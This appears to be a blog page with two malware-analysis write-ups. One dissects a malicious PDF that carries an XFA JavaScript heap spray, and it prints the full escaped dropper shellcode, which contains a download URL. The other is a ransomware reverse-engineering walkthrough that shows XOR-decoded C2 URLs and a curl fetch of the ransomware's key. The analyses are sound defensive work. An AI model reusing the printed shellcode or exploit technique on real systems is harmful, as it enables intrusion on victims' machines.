Code|Beta

Analyzing PDF Malware

Thu, 01 Jan 2026 17:21:24 +0000

The Portable Document Format (PDF) files are capable of containing JavaScript code or embedding other files. Malware authors often leverage these features to spread malware; however, this is dependent on the application used to view the document, as different PDF viewers handle embedded content and JavaScript differently.

The malicious document analyzed in this post leverages a vulnerability in a specific PDF viewing application to achieve code execution. As a result, not all victims who open this PDF file will trigger the malicious behavior.

Sample Overview

Initial analysis focuses on information that can be obtained from a file without dissecting the sample, with the goal of answering a basic question: what is this?

The file has been observed under several names; for this post, the name kissasszod.pdf (SHA256 4a65b640318c8cc4ce906a7d03ca78b33b21dedaad3a787d32ffadbb955dee22) is used. The file is 10,799 bytes (~12 KB) in size and contains a malicious payload that is executed when opened by a vulnerable PDF reader.

This is an older malware sample, with it being originally submitted to VirusTotal in 2011, but it remains a useful example of PDF-based exploitation techniques for those learning to analyze malicious documents.

This file is confirmed to be a PDF document, as shown in the screenshot below. The output of the exiftool also reports a warning on the cross-reference table (xref).

The PDF targets version 1.6 of the specification, which was released in 2004 and was already outdated by the time the sample was first submitted to VirusTotal, since version 1.7 was released in 2006.

As part of the initial triage, the pdfinfo tool was used to identify high-level document characteristics without parsing the embedded objects. Metadata fields such as the title, subject, author, and creator contain strings that don't make sense, a common aspect of malicious documents that were created with a tool or modified to avoid attribution.

The creation timestamp predates submission to VirusTotal, suggesting the document may have been distributed for several months before it was detected properly or it might be as part of a broader campaign.

While the output mentions that no JavaScript present, this is due to the sample not having traditional document-level JavaScript and does not exclude the possibility of code being embedded elsewhere in the file. Additionally, the existence of an XFA form is relevant, as this feature that has been abused by malware authors due to inconsistent handling across PDF readers and its expanded attack surface.

Based on the initial triage for this PDF document, there is a need to further investigate and have a focus on the XFA form and document content.

PDF Structure Analysis

While there are tools available to automate aspects of the PDF analysis, such as peepdf, this section takes a manual approach. Focusing on manually analyzing the PDF structure to understand how the document is organized and to identify interesting components that may be responsible for malicious behavior.

PDF readers begin processing a document by locating the trailer dictionary, which is normally found near the end of the file. This element serves a function similar to a table of contents, as it provides references to several components of the document, including the root object and cross-reference (xref) information. The command sed -n '/^trailer/,/^>>/p' kissasszod.pdf can be used to extract the trailer dictionary from the file for closer inspection.

The output shows that the root element is located at the object 18, as indicated by the /Root 18 0 R entry. The root element references the document catalog, which allows the reader to locate the objects that define the document's layout and behavior.

Objects in a PDF document follow a basic structure, shown below:

X Y obj
<<
[..data..]
>>
endobj

In this structure, X represents the object number, while Y represents the generation number. The generation number allows multiple versions of an object to exist, which allows for a document to be updated incrementally; however, it's more common to see a single version of an object, which the generation number set to 0.

Understanding this structure makes it straightforward to extract the root object from the sample using the command sed -n '/^18 0 obj/,/^endobj/p' kissasszod.pdf.

The /Type /Catalog confirms that this object is the catalog and that the object is in fact the entry point for the PDF. The /Pages 2 0 R is the reference to the object that contains the page tree, this object frequently references streams, forms, or annotations, which also means that malicious content may be indirectly reached from here.

The /AcroForm entry is notable, since this indicates the presence of interactive form elements, which is one area that has been often abused for malicious code when combined with XFA-based content.

Extracting the object 17 for analysis using the command sed -n '/^17 0 obj/,/^endobj/p' kissasszod.pdf

The presence of the XML Forms Architecture (XFA) entry is significant, having multiple references rather than relying in a single stream. There are 8 indirect references that can be looked into for analysis.

The following command can be used to look through these objects at once

awk '
/^(6|7|8|9|1[0-3]) 0 obj/ {flag=1}
flag {print}
/^endobj/ {flag=0}
' kissasszod.pdf

The results show several referenced objects, with two standing out due to their larger size and the presence of data that does not appear to be normal.

The command sed -En '/^(8|10) 0 obj/,/^endobj/p' kissasszod.pdf can be used to focus on these two objects

Placing special attention on the stream sections of these objects reveals XML content, with one of the objects containing JavaScript that appears to be obfuscated.

Obfuscated JavaScript Analysis

The following command can be used to extract the JavaScript code from object 8:

sed -n '/^8 0 obj/,/^endobj/p' kissasszod.pdf | sed -n '/^stream/,/^endstream/{/^stream/d;/^endstream/d;p}' | xmllint --xpath '//*[local-name()="script"]/text()' - | js-beautify

The command uses the xmllint and js-beautify utilities to extract the JavaScript code from the XML stream and display it in a more readable format.

The JavaScript code uses simple obfuscation, which simplifies the process to remove the weird logic and recover a more readable version of the script.

After cleaning up the script and renaming functions and variables for clarity, the recovered JavaScript code is shown below:

The script implements a decoder routine and ends up executing the decoded payload using the eval function. The encoded data is retrieved from an object named khfdskjfh, which doesn't appear within the JavaScript itself. Instead, the value is accessed via khfdskjfh['rawValue'], a pattern that is atypical for standalone JavaScript but consistent with how form field values are stored and accessed within a PDF document through AcroForm handling.

The following command is used to extract the encoded data stored in khfdskjfh, which is located within object 10 of the PDF document:

sed -n '/^10 0 obj/,/^endobj/p' kissasszod.pdf | sed -n '/^stream/,/^endstream/{/^stream/d;/^endstream/d;p}' | xmllint --xpath '//*[local-name()="khfdskjfh"]/text()' -

The resulting output is shown in the screenshot below:

Reviewing the decoder logic, two lines clearly define how the encoded numeric data is split into separate components:

khfdskjfh['rawValue'].substring(0, 50)
khfdskjfh['rawValue'].substring(50)

The first 50 characters are copied to the encoded_table, meaning that they are used to construct the character translation table, while the remaining characters represent the encoded payload that will be decoded and executed. This separation explains why the data stored in khfdskjfh appears as a single large numeric block, despite serving two distinct purposes during execution.

By formatting the code and removing the possibility of it actually executing the decoded payload, the decoding function can be safely run using NodeJS to recover the hidden content. The screenshot below shows the second stage of the malicious code:

This second-stage JavaScript code continues with the trend of having simple obfuscation and being quite readable as it is.

The _X function acts as the entry point and contains the primary payload construction logic. Two payload components are handled, each encoded differently: one is Base64-encoded data, while the other is escaped binary data. The Base64 payload is dynamically built and stored in the same AcroForm field (khfdskjfh) that held the encoded second-stage JavaScript. No decoding is done on the Base64 string within this script, it may be consumed by the vulnerable program.

The _DI function is used to identify the version of the PDF reader by querying the viewer version. Based on the detected version, one of two payload variants is used, suggesting compatibility handling for different target environments.

The _R and _M functions are utility routines used to expand strings at runtime, this to reduce the overall script size while allowing large buffers to be constructed as needed. The _R expands the string QUFB, which is the Base64-encoded representation of AAA, a pattern that is commonly seen in buffer overflow exploitation. The _M function expands the value 0x9090, which corresponds to the x86 No Operation (NOP) instruction, this forms a NOP sled that increases the reliability of redirecting execution flow during exploitation.

The _L function is used to prepare the shellcode that is stored in the _ET variable and placing it into memory via the _Q array. The shellcode is repeatedly added to the array, some 400 times, this behavior is common with a heap spray, as it increases the likelihood that the shellcode resides at a predictable memory location when the vulnerability is triggered.

The _L function relies on JavaScript's unescape function to carry out the conversion from the escaped shellcode to the binary representation. Since unescape is deprecated and behaves differently across JavaScript engines, attempting to run the second-stage code directly in NodeJS produces invalid shellcode. To avoid this issue, the following Python script is used to accurately reconstruct the binary shellcode.

#!/usr/bin/env python3

import re

def unescape(escapedBytes, use_unicode=True):
    unescaped = bytearray()
    unicodePadding = b'\x00' if use_unicode else b''
    try:
        lowered = escapedBytes.lower()
        if '%u' in lowered or '\\u' in lowered or '%' in escapedBytes:
            if '\\u' in lowered:
                splitBytes = escapedBytes.split('\\')
            else:
                splitBytes = escapedBytes.split('%')
            for i, splitByte in enumerate(splitBytes):
                if not splitByte:
                    continue
                if (
                    len(splitByte) > 4 and
                    re.match(r'u[0-9a-f]{4}', splitByte[:5], re.IGNORECASE)
                ):
                    unescaped.append(int(splitByte[3:5], 16))
                    unescaped.append(int(splitByte[1:3], 16))
                    for ch in splitByte[5:]:
                        unescaped.extend(ch.encode('latin-1'))
                        unescaped.extend(unicodePadding)
                elif (
                    len(splitByte) > 1 and
                    re.match(r'[0-9a-f]{2}', splitByte[:2], re.IGNORECASE)
                ):
                    unescaped.append(int(splitByte[:2], 16))
                    unescaped.extend(unicodePadding)
                    for ch in splitByte[2:]:
                        unescaped.extend(ch.encode('latin-1'))
                        unescaped.extend(unicodePadding)
                else:
                    if i != 0:
                        unescaped.extend(b'%')
                        unescaped.extend(unicodePadding)
                    for ch in splitByte:
                        unescaped.extend(ch.encode('latin-1'))
                        unescaped.extend(unicodePadding)
        else:
            unescaped.extend(escapedBytes.encode('latin-1'))
    except Exception:
        return (-1, b'Error while unescaping the bytes')
    return (0, bytes(unescaped))

ET = (
    '%u204C%u0F60%u63A5%u4A80%u203C%u0F60%u2196'
    '%u4A80%u1F90%u4A80%u9030%u4A84%u7E7D%u4A80'
    '%u4141%u4141%26%00%00%00%00%00%00%00%u8871'
    '%u4A80%u2064%u0F60%u0400%00%u4141%u4141%u4141'
    '%u4141%u9090%u9090%u9090%u9090%uFBE9%00%u5F00'
    '%uA1640%00%u408B%u8B0C%u1C70%u8BAD%u2068%u7D80'
    '%u330C%u0374%uEB96%u8BF3%u0868%uF78B%u046A%uE859'
    '%8F%00%uF9E2%u6F68n%u6800%u7275%u6D6C%uFF54'
    '%u8B16%uE8E8y%00%uD78B%u8047%3F%uFA75%u5747%u8047'
    '%3F%uFA75%uEF8B%u335F%u81C9%u04EC%01%u8B00%u51DC'
    '%u5352%u0468%01%uFF00%u0C56%u595A%u5251%u028B%u4353'
    '%u3B80%u7500%u81FA%uFC7B%u652E%u6578%u0375%uEB83'
    '%u8908%uC703%u0443%u652E%u6578%u43C6%08%u8A5B%u04C1'
    '%u8830E%uC033%u5050%u5753%uFF50%u1056%uF883%u7500'
    '%u6A06%u5301%u56FF%u5A04%u8359%u04C2%u8041%3A%uB475'
    '%u56FF%u5108%u8B56%u3C75%u748B%u7835%uF503%u8B56'
    '%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238'
    '%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E'
    '%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u5EAB'
    '%uC359%E8%uFFFF%u8EFF%u0E4E%u98EC%u8AFE%u7E0E%uE2D8'
    '%u3373%u8ACA%u365B%u2F1A%u6F70%u646Ec%u7468%u7074%u2f3a'
    '%u6d2f%u7261%u6e69%u6461%u3361%u632e%u6d6f%u382f%u2f38'
    '%u696d%u7263%u6d6f%u6361%u6968%u656e%u2e73%u6870%u3f70'
    '%u3d65%u2633%u3d6e'
)

status, data = unescape(ET)

with open('shellcode.bin', "wb") as f:
    f.write(data)

The binary file is shown below. Without going further, a URL is visible at the end of the code. This shellcode functions as a dropper, retrieving additional stages of the malware from the referenced domain. From an investigation standpoint, this indicator would be used to determine whether the domain was accessed by any endpoint.

Despite this being an older sample, having been first seen more than 15 years ago, the infrastructure and vulnerability used by the malware is no longer active. This results in further investigation not being possible.

Regardless, the sample remains as a valuable case study. The analysis shows practical techniques for triaging and dissecting malicious PDF documents, including identifying embedded JavaScript, navigating PDF structure, and safely extracting and interpreting exploit code. Techniques that remain relevant today, as many modern malicious documents continue to rely on the same fundamental concepts, even when the tools and delivery methods have evolved.

References

VirusTotal. (2011, February 7). kissasszod.pdf [Malware analysis report]. https://www.virustotal.com/gui/file/4a65b640318c8cc4ce906a7d03ca78b33b21dedaad3a787d32ffadbb955dee22
Esparza, J. (2011, November 14). Analysis of a malicious PDF from a SEO sploit pack. Eternal Todo. https://eternal-todo.com/blog/seo-sploit-pack-pdf-analysis
Wikipedia contributors. (2025, October 15). History of PDF. In Wikipedia, The Free Encyclopedia. Retrieved 21:31, December 27, 2025, from https://en.wikipedia.org/w/index.php?title=HistoryofPDF&oldid=1316915536

HTB Sherlocks: Lockpick 2

Mon, 17 Jun 2024 01:51:06 +0000

The Lockpick 2 challenge is part of the HackTheBox Sherlocks defensive security scenarios. This challenge is already retired, and available for VIP members.

The challenge description mentions that the organization was hit with a ransomware, with it managing to encrypt a large amount of files. The organization has a stance on not paying the ransom, thus they need to have the captured sample analyzed to determine if it's possible to decrypt the files.

This write-up uses static analysis of the files, and Radare2 for the analysis of the binary.

The provided ZIP archive contains several encrypted files with the extension 24bes, the ransomware and danger note, and another ZIP archive that contains the binary sample to be analyzed. Below is the structure of the ZIP archive for the challenge.

lockpick2.0
├── DANGER.txt
├── malware.zip
└── share
    ├── countdown.txt
    ├── expanding-horizons.pdf.24bes
    └── takeover.docx.24bes

For documentation purposes, hashes of the files are collected.

452c3328667b7242132bf0821c9d4424  ./lockpick2.0/share/takeover.docx.24bes
425d610faab2eb49d5aec7f37de59484  ./lockpick2.0/share/expanding-horizons.pdf.24bes
e2edc252b5776a1e9c63c58b5328ae3a  ./lockpick2.0/share/countdown.txt
62c05b0f64aa0bd8419c30216b2f106d  ./lockpick2.0/DANGER.txt
bee5debabd4ab24a5d844f8bc0562e33  ./lockpick2.0/malware.zip

The DANGER.txt file is a note to the analyst, providing some analysis instructions and the password for the ZIP archive that contains the binary sample.

Let us analyze the files within the share directory.

The countdown.txt file is the ransom note left by the ransomware, it contains a BTC address and an Onion address that can be used to reach out to the threat actors.

The BTC address can be checked through a blockchain tracker. This is outside of the scope of this analysis, so we'll just make a note of the information as indicators of compromise (IoC).

The Onion address is also being documented as an IoC, and any monitoring tools used within the organization checked for the presence of connection attempts to this address.

Reviewing the files with the extension 24bes, they show up as being data

$ file -k expanding-horizons.pdf.24bes takeover.docx.24bes
expanding-horizons.pdf.24bes: data
takeover.docx.24bes:          data

Which is expected since the data is encrypted, this can be further confirmed by checking the initial bytes of the file with a hex editor or hex dump tool such as xxd

$ xxd -l 64 expanding-horizons.pdf.24bes
00000000: 0109 8fec f14f 7659 16bf ee41 7d13 1624  .....OvY...A}..$
00000010: 2175 87e4 9f7f ca99 db8b ab7f b13f 6370  !u...........?cp
00000020: 0517 0432 99d4 ed8f 494b 24c1 5e89 21b0  ...2....IK$.^.!.
00000030: 8ec5 74d3 e96a 80c8 389b 6c05 7f6a c0ef  ..t..j..8.l..j..

$ xxd -l 64 takeover.docx.24bes
00000000: 16b1 2ad0 2a87 38a4 7a5b 9e59 5b3a 8801  ..*.*.8.z[.Y[:..
00000010: 2daf 1eae bf01 5b06 5a3f b4f6 ef5c 4c00  -.....[.Z?...\L.
00000020: 1930 282b 1028 9553 ebaf ffbd 4118 9e86  .0(+.(.S....A...
00000030: 7c7b 70c3 102b f249 cd9e c0ec a7df 88f1  |{p..+.I........

There is no recognizable magic bytes for the files. At this point there's nothing else to analyze of these files.

Initial Analysis of update

The binary sample in the ZIP archive is named update, the first step after extracting the file is to generate the hash

$ md5sum update
8b2d4bc2f26d76c1a900e53483731013  update

The hash is then checked in malware analysis services, such as VirusTotal, to determine if the sample has been submitted previously or if it may be a new malware or targeted. Checking in VirusTotal shows that there are 33 out of 65 providers have tagged this binary as malicious, it confirms the suspicion on this being the ransomware.

The tags for this entry show that the binary is packed using UPX Packer, which is a common packer used to obfuscate binaries, and threat actors also use this packer to obfuscate their malware with the intention of complicating analysis.

Let us further analyze this binary to determine how it manages to encrypts the data.

The binary file is loaded into Detect It Easy, with the intention of confirming the packing being used. There are several ways that the packing being used can be confirmed, further information on this can be found on the post Analyzing Packed Binaries.

The packed binary can be extracted by using the UPX Packer with the following command

./upx -d -o update.elf update

The unpacked binary is saved to disk with the filename update.elf, this can now be analized by reverse engineering. Loading this binary into Radare2 for the reverse engineering.

$ r2 update.elf
[0x00001280]> aaaa
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods (af @@ method.*)
INFO: Recovering local variables (afva@@@F)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Scanning for strings constructed in code (/azs)
INFO: Finding function preludes (aap)
INFO: Enable anal.types.constraint for experimental type propagation
[0x00001280]>

After loading the binary in r2, the aaaa command analyzes the binary to identify the different parts that make up the program. One of the first parts to check are the strings, this is achieved with the iz command

[0x00001280]> iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00003010 0x00003010 5   6    .rodata ascii \nCLIG
1   0x00003030 0x00003030 5   6    .rodata ascii \nCLIG
2   0x00003050 0x00003050 5   6    .rodata ascii \nCLIG
3   0x00003070 0x00003070 5   6    .rodata ascii \nCLIG
4   0x00003090 0x00003090 5   6    .rodata ascii \nCLIG
5   0x000030a3 0x000030a3 18  19   .rodata ascii b7894532snsmajuys6
6   0x000030b8 0x000030b8 31  32   .rodata ascii curl_easy_perform() failed: %s\n
7   0x000030d8 0x000030d8 31  32   .rodata ascii Could not open output file: %s\n
8   0x000030f8 0x000030f8 4   5    .rodata ascii .txt
9   0x000030fd 0x000030fd 4   5    .rodata ascii .pdf
10  0x00003102 0x00003102 4   5    .rodata ascii .sql
11  0x0000310b 0x0000310b 5   6    .rodata ascii .docx
12  0x00003111 0x00003111 5   6    .rodata ascii .xlsx
13  0x00003117 0x00003117 5   6    .rodata ascii .pptx
14  0x0000311d 0x0000311d 4   5    .rodata ascii .zip
15  0x00003122 0x00003122 4   5    .rodata ascii .tar
16  0x00003127 0x00003127 7   8    .rodata ascii .tar.gz
17  0x0000312f 0x0000312f 13  14   .rodata ascii countdown.txt
18  0x0000313d 0x0000313d 7   8    .rodata ascii /share/
19  0x00003145 0x00003145 15  16   .rodata ascii Update failed.\n
20  0x00003158 0x00003158 40  41   .rodata ascii Running update, testing update endpoints
21  0x00003181 0x00003181 11  12   .rodata ascii Updating %s
22  0x0000318d 0x0000318d 11  12   .rodata ascii  Successful
23  0x000031a0 0x000031a0 46  47   .rodata ascii Update complete - thank you for your patience.
24  0x000031cf 0x000031cf 16  17   .rodata ascii %s/countdown.txt
25  0x000031e0 0x000031e0 32  33   .rodata ascii https://pastes.io/raw/foiawsmlsk
26  0x00003201 0x00003201 5   6    .rodata ascii %s/%s
27  0x00003210 0x00003210 30  31   .rodata ascii Could not open input file: %s\n
28  0x0000322f 0x0000322f 8   9    .rodata ascii %s.24bes
29  0x00003240 0x00003240 39  40   .rodata ascii Failed to delete the original file: %s\n

Let's analyze the strings that are shown here

The strings show several extensions that can point to the file that the ransomware targets.
There is also 2 strings that point to the filename of the ransom note that was included in the ZIP archive.
There's mention of the /share/ path which may point to the share directory that was included in the ZIP archive.
The extension 24bes is also mentioned.
The URL https://pastes.io/raw/foiawsmlsk needs to be further investigated
There are other strings that point to status or error messages, as well as some that may either be encrypted or encoded.

Checking the URL, it shows that the ransom note is stored. This allows for the threat actor to modify the note without having to release new malware.

There's not much else to go on with the strings, so let's now look at the libraries that are used by the ransomware. The command il shows the linked libraries.

[0x00001280]> il
[Linked libraries]
libcrypto.so.3
libcurl.so.4
libc.so.6

3 libraries

The libraries that are imported give an idea of the functionality that this ransomware has, keeping in mind that it is possible that the malware loads additional libraries dynamically during execution.

Based on these libraries, the following can be determined

The libcrypto library provides the encryption capabilities, which are obvious for a ransomware.
The libcurl library is used to download and upload data through various protocols.

Based on the information that is known up to this point, the libcurl appears to be used to obtain the ransom note from the URL that was found in the strings. However, it's still unknown how the encryption happens or what key is used, so further analysis of the functions is needed.

Analyzing the Functions

Let's first focus on the functions that are used from the libraries that are imported by the binary. The command ii is used to list these functions, the output from Radare2 shows the function name

[0x00001280]> ii
[Imports]
nth vaddr      bind   type   lib name
―――――――――――――――――――――――――――――――――――――
1   0x00001030 GLOBAL FUNC       printf
2   0x00001040 GLOBAL FUNC       EVP_EncryptUpdate
3   0x00001050 GLOBAL FUNC       curl_global_init
4   0x00001060 GLOBAL FUNC       curl_global_cleanup
5   0x00001070 GLOBAL FUNC       strlen
6   0x00001080 GLOBAL FUNC       OPENSSL_init_crypto
7   0x00001090 GLOBAL FUNC       ERR_print_errors_fp
8   0x000010a0 GLOBAL FUNC       abort
9   0x000010b0 GLOBAL FUNC       EVP_EncryptInit_ex
10  0x000010c0 GLOBAL FUNC       EVP_aes_256_cbc
11  0x000010d0 GLOBAL FUNC       EVP_CIPHER_CTX_new
12  ---------- GLOBAL FUNC       __libc_start_main
13  0x000010e0 GLOBAL FUNC       sleep
14  0x000010f0 GLOBAL FUNC       memcpy
15  0x00001100 GLOBAL FUNC       stat
16  0x00001110 GLOBAL FUNC       fclose
17  0x00001120 GLOBAL FUNC       EVP_CIPHER_CTX_free
18  0x00001130 GLOBAL FUNC       strrchr
19  0x00001140 GLOBAL FUNC       curl_easy_setopt
20  0x00001150 GLOBAL FUNC       fflush
21  0x00001160 GLOBAL FUNC       fopen
22  0x00001170 GLOBAL FUNC       curl_easy_cleanup
23  0x00001180 GLOBAL FUNC       curl_easy_init
24  0x00001190 GLOBAL FUNC       curl_easy_perform
25  0x000011a0 GLOBAL FUNC       putchar
26  0x000011b0 GLOBAL FUNC       strcmp
27  0x000011c0 GLOBAL FUNC       fprintf
28  0x000011d0 GLOBAL FUNC       curl_easy_strerror
29  0x000011e0 GLOBAL FUNC       fread
30  0x000011f0 GLOBAL FUNC       opendir
31  0x00001200 GLOBAL FUNC       readdir
32  0x00001210 GLOBAL FUNC       puts
33  0x00001220 GLOBAL FUNC       EVP_EncryptFinal_ex
34  0x00001230 GLOBAL FUNC       snprintf
35  0x00001240 GLOBAL FUNC       closedir
36  ---------- WEAK   NOTYPE     _ITM_deregisterTMCloneTable
37  0x00001250 GLOBAL FUNC       remove
38  ---------- WEAK   NOTYPE     __gmon_start__
39  ---------- WEAK   NOTYPE     _ITM_registerTMCloneTable
40  0x00001260 GLOBAL FUNC       fwrite
42  0x00001270 WEAK   FUNC       __cxa_finalize

There are several functions that call my attention and that provide some relevant information

The EVP_aes_256_cbc (0x10c0) function points to the encryption algorithm that is being used by the ransomware.
There are several file handling functions, which is expected.
The cURL functions are expected, but the most relevant one is the curl_easy_perform (0x1190) since it's the one that is used to download data.

Before looking further into where the 2 functions mentioned above are used within the malware, let's look at the functions that are exported by the binary by using the iE command.

[0x00001280]> iE
[Exports]
nth paddr      vaddr      bind   type   size lib name                demangled
――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
41  ---------- 0x00005140 GLOBAL OBJ    8        stdout
43  ---------- 0x00005160 GLOBAL OBJ    8        stderr
49  ---------- 0x00005140 GLOBAL OBJ    8        stdout@GLIBC_2.2.5
50  0x00003030 0x00003030 GLOBAL OBJ    19       K2
52  0x00001af3 0x00001af3 GLOBAL FUNC   394      get_key_from_url
53  ---------- 0x00005138 GLOBAL NOTYPE 0        _edata
56  0x00003000 0x00003000 GLOBAL OBJ    4        _IO_stdin_used
58  0x00003050 0x00003050 GLOBAL OBJ    19       K3
62  0x00001787 0x00001787 GLOBAL FUNC   810      main
63  0x00004130 0x00005130 GLOBAL OBJ    8        HESB
66  0x00004128 0x00005128 GLOBAL OBJ    0        __dso_handle
68  0x00001ab1 0x00001ab1 GLOBAL FUNC   66       write_binary_data
69  0x00003070 0x00003070 GLOBAL OBJ    19       K4
72  0x00001c7d 0x00001c7d GLOBAL FUNC   426      handle_directory
73  0x00002064 0x00002064 GLOBAL FUNC   0        _fini
77  0x00003090 0x00003090 GLOBAL OBJ    19       K5
79  0x0000141d 0x0000141d GLOBAL FUNC   140      xor_cipher
80  0x000014a9 0x000014a9 GLOBAL FUNC   58       write_data
81  0x0000161c 0x0000161c GLOBAL FUNC   24       handleErrors
82  0x00001280 0x00001280 GLOBAL FUNC   34       _start
84  0x000014e3 0x000014e3 GLOBAL FUNC   313      download_lyrics
87  0x00001000 0x00001000 GLOBAL FUNC   0        _init
88  ---------- 0x00005138 GLOBAL OBJ    0        __TMC_END__
94  0x0000173d 0x0000173d GLOBAL FUNC   74       encrypt
96  ---------- 0x00005160 GLOBAL OBJ    8        stderr@GLIBC_2.2.5
97  0x00004120 0x00005120 GLOBAL NOTYPE 0        __data_start
98  ---------- 0x00005170 GLOBAL NOTYPE 0        _end
105 ---------- 0x00005138 GLOBAL NOTYPE 0        __bss_start
108 0x00001e27 0x00001e27 GLOBAL FUNC   573      encrypt_file
109 0x00001634 0x00001634 GLOBAL FUNC   265      is_target_extension
115 0x00003010 0x00003010 GLOBAL OBJ    19       K1

Focusing on the lines that have the type of FUNC, there are 2 functions that appear to be relevant

The function get_key_from_url (0x1af3) points to the a key being obtained from an external source, which could potentially be the encryption key.
The xor_cipher (0x141d) function points to the use of XOR encryption being used besides the AES algorithm.

Let's see if there is any relation between these 4 functions that are considered relevant in this binary. The axt command is used to find the references to a specified address, the sintaxis of this command is axt .

Let's look at the usage of the EVP_aes_256_cbc function. The output shows that the function is called from the sym.encrypt_file function, confirming that it's the encryption algorithm being used to encrypt the files.

[0x00001280]> axt 0x10c0
sym.encrypt_file 0x1f22 [CALL:--x] call sym.imp.EVP_aes_256_cbc

The curl_easy_perform function is called by 2 different functions, with the get_key_from_url being the more relevant one. This confirms that data is being downloaded.

[0x00001280]> axt 0x1190
sym.download_lyrics 0x159f [CALL:--x] call sym.imp.curl_easy_perform
sym.get_key_from_url 0x1bdc [CALL:--x] call sym.imp.curl_easy_perform

The get_key_from_url function is called from the main function.

[0x00001280]> axt 0x1af3
main 0x17c4 [CALL:--x] call sym.get_key_from_url

The xor_cipher is called from the get_key_from_url function, which can mean that there is one or more pieces of data that are encrypted and that are used in relation to the key that is downloaded.

[0x00001280]> axt 0x141d
main 0x186c [CALL:--x] call sym.xor_cipher
main 0x18fe [CALL:--x] call sym.xor_cipher
main 0x1990 [CALL:--x] call sym.xor_cipher
main 0x1a22 [CALL:--x] call sym.xor_cipher
sym.get_key_from_url 0x1b45 [CALL:--x] call sym.xor_cipher

The focus now shifts to look into the get_key_from_url function, in order to determine the URL that the key is obtained from. The first step is to move the address where the function starts, this is achieved with the command s 0x1af3, and then print the disassembled function using the pdf command.

[0x00001af3]> pdf
            ; CALL XREF from main @ 0x17c4(x)
┌ 394: sym.get_key_from_url (void *arg1, int64_t arg2);
│           ; arg void *arg1 @ rdi
│           ; arg int64_t arg2 @ rsi
│           ; var uint32_t var_8h @ rbp-0x8
│           ; var int64_t var_ch @ rbp-0xc
│           ; var int64_t var_10h @ rbp-0x10
│           ; var int64_t var_14h @ rbp-0x14
│           ; var int64_t var_18h @ rbp-0x18
│           ; var uint32_t var_1ch @ rbp-0x1c
│           ; var void *s2 @ rbp-0x50
│           ; var int64_t var_90h @ rbp-0x90
│           ; var void *s1 @ rbp-0x98
│           ; var int64_t var_a0h @ rbp-0xa0
│           0x00001af3      55             push rbp
│           0x00001af4      4889e5         mov rbp, rsp
│           0x00001af7      4881eca000..   sub rsp, 0xa0
│           0x00001afe      4889bd68ff..   mov qword [s1], rdi         ; arg1
│           0x00001b05      4889b560ff..   mov qword [var_a0h], rsi    ; arg2
│           0x00001b0c      bf03000000     mov edi, 3
│           0x00001b11      e83af5ffff     call sym.imp.curl_global_init
│           0x00001b16      e865f6ffff     call sym.imp.curl_easy_init
│           0x00001b1b      488945f8       mov qword [var_8h], rax
│           0x00001b1f      48837df800     cmp qword [var_8h], 0
│       ┌─< 0x00001b24      0f840f010000   je 0x1c39
│       │   0x00001b2a      488b15ff35..   mov rdx, qword [obj.HESB]   ; [0x5130:8]=0x30a3 str.b7894532snsmajuys6 ; char *arg3
│       │   0x00001b31      488d8570ff..   lea rax, [var_90h]
│       │   0x00001b38      4889c6         mov rsi, rax                ; int64_t arg2
│       │   0x00001b3b      488d05ce14..   lea rax, obj.K1             ; 0x3010 ; "\nCLIG\x0f\x1c\x1d\x01\f]\n\x18EF\x1f\x1fE\x1b"
│       │   0x00001b42      4889c7         mov rdi, rax                ; char *arg1
│       │   0x00001b45      e8d3f8ffff     call sym.xor_cipher
[..SNIP..]

The function is long, so focusing on the first lines of the function, it becomes apparent data is decrypted as the initial steps. Let's break down the information that is seen.

At address 0x1b2a the value b7894532snsmajuys6 is moved into the rdx register, this would be the key being used for the encryption and decryption.
The memory address of a binary value is being stored in the rax register, this could be the encrypted data.

The binary data is found at the address 0x3010, the command px can be used to print the hex dump of the memory region, the full command is px @ 0x3010, and the screenshot below shows the binary data that is referenced

To make it easier to handle the binary data, we'll copy the hex bytes, these being 0a434c49470f1c1d010c5d0a1845461f1f451b. CyberChef can be used to decrypt the data, with the operations From Hex and XOR.

The encrypted data contained the URL https://rb.gy/3flsy, which would mean that the key that is used would be downloaded from this address.

Reviewing the hex dump above, it appears that there are other URLs that are encrypted, and the CLIG string is a common denominator among them. Decrypting these URLs can be done in the same manner as shown above, they are decoys and don't contain any valuable data, so are skipped for the purposes of this writeup.

Further reviewing the disassembled function, specifically how the data is downloaded from the URL. Checking the documentation for this function shows that this is used to perform a blocking file transfer, the example shows that the data that is downloaded is stored in a variable.

int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    CURLcode res;
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com");
    res = curl_easy_perform(curl);
    curl_easy_cleanup(curl);
  }
}

The above code shows that the curl_easy_setopt function is called to configure the curl object, and then the curl_easy_perform function is called to execute the download action.

The following command can be used to download the data to a file named 3flsy.

curl -vLO --url 'https://rb.gy/3flsy'

Checking the file, it contains binary data, and it can be viewed with xxd to obtain the data

$ xxd 3flsy
00000000: f3fc 056d a118 5eae 370d 76d4 7c4c f9db  ...m..^.7.v.|L..
00000010: 9f4e fd1c 1585 cde3 a7bc c6cb 5889 f6db  .N..........X...
00000020: 0144 8c79 0993 9e13 ce35 9710 b9f0 dc2e  .D.y.....5......

Decrypting the Files

Now that the key has been obtained, we need to determine how to decrypt the files. Reviewing the available data, the files are encrypted using AES 256 CBC algorithm, and this can be decrypted using CyberChef.

By using the AES Decrypt operation it is possible to decrypt the files, there is relevant information displayed in the output

Invalid key length: 0 bytes

The following algorithms will be used based on the size of the key: 16 bytes = AES-128 24 bytes = AES-192 32 bytes = AES-256

Knowing that the encryption used is AES 256, the key should have a length of 32 bytes. However, the file has a size of 48 bytes, this means that it contains 16 additional bytes.

